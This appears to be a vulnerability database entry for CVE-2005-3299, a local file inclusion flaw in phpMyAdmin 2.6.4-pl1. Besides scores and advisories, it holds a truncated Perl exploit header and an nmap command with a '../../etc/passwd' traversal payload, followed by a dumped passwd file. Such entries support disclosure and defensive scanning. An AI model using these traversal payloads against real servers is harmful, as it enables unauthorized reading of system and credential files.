CVE-2005-3299

Published: 23/10/2005 Updated: 05/09/2008
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 520
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

Vulnerability Summary

PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote malicious users to include local files via the $__redirect parameter, possibly involving the subform array.

Vulnerable Product

phpmyadmin phpmyadmin 2.6.4

phpmyadmin phpmyadmin 2.6.4_pl1

Vendor Advisories

Debian Bug report logs - #333433
phpmyadmin: Possible directory traversal vulnerability
Package: phpmyadmin
Maintainer for phpmyadmin is Thijs Kinkhorst <thijs@debian.org>
Source for phpmyadmin is src:phpmyadmin
Reported by: Daniel Leidert <danielleidert@wgddde>
Date: Tue, 11 Oct 2005 22:03: ...

Exploits

#!/usr/bin/perl
use IO::Socket;
# SecurityReasoncom TEAM
# Maksymilian Arciemowicz ( cXIb8O3 ) cxib@securtiyreasoncom
#
# Local file inclusion (/$FILE)
# simple exploit phpMyAdmin 264-pl1
#
#
# SecurityReasoncom
if (@ARGV < 3)
{
print "\r\n SecurityReason TEAM\r\n";
print "[cXIb8O3] EXPLOIT for phpMyAdmin 264-pl1\r\n";
print " \r\n";
p ...

Nmap Scripts

http-phpmyadmin-dir-traversal

Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.

nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip>
nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip>

PORT   STATE SERVICE
80/tcp open  http
| http-phpmyadmin-dir-traversal:
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2005-3299
|     Description:
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../../../../etc/passwd :
|   root:x:0:0:root:/root:/bin/bash
|   daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|   bin:x:2:2:bin:/bin:/bin/sh
|   sys:x:3:3:sys:/dev:/bin/sh
|   sync:x:4:65534:sync:/bin:/bin/sync
|   games:x:5:60:games:/usr/games:/bin/sh
|   man:x:6:12:man:/var/cache/man:/bin/sh
|   lp:x:7:7:lp:/var/spool/lpd:/bin/sh
|   mail:x:8:8:mail:/var/mail:/bin/sh
|   news:x:9:9:news:/var/spool/news:/bin/sh
|   uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
|   proxy:x:13:13:proxy:/bin:/bin/sh
|   www-data:x:33:33:www-data:/var/www:/bin/sh
|   backup:x:34:34:backup:/var/backups:/bin/sh
|   list:x:38:38:Mailing List Manager:/var/list:/bin/sh
|   irc:x:39:39:ircd:/var/run/ircd:/bin/sh
|   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
|   nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
|   libuuid:x:100:101::/var/lib/libuuid:/bin/sh
|   syslog:x:101:103::/home/syslog:/bin/false
|   sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
|   dps:x:1000:1000:dps,,,:/home/dps:/bin/bash
|   vboxadd:x:999:1::/var/run/vboxadd:/bin/false
|   mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
|   memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false
|   ../../../../../../../../etc/passwd saved to passwd.txt
|
|     References:
|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/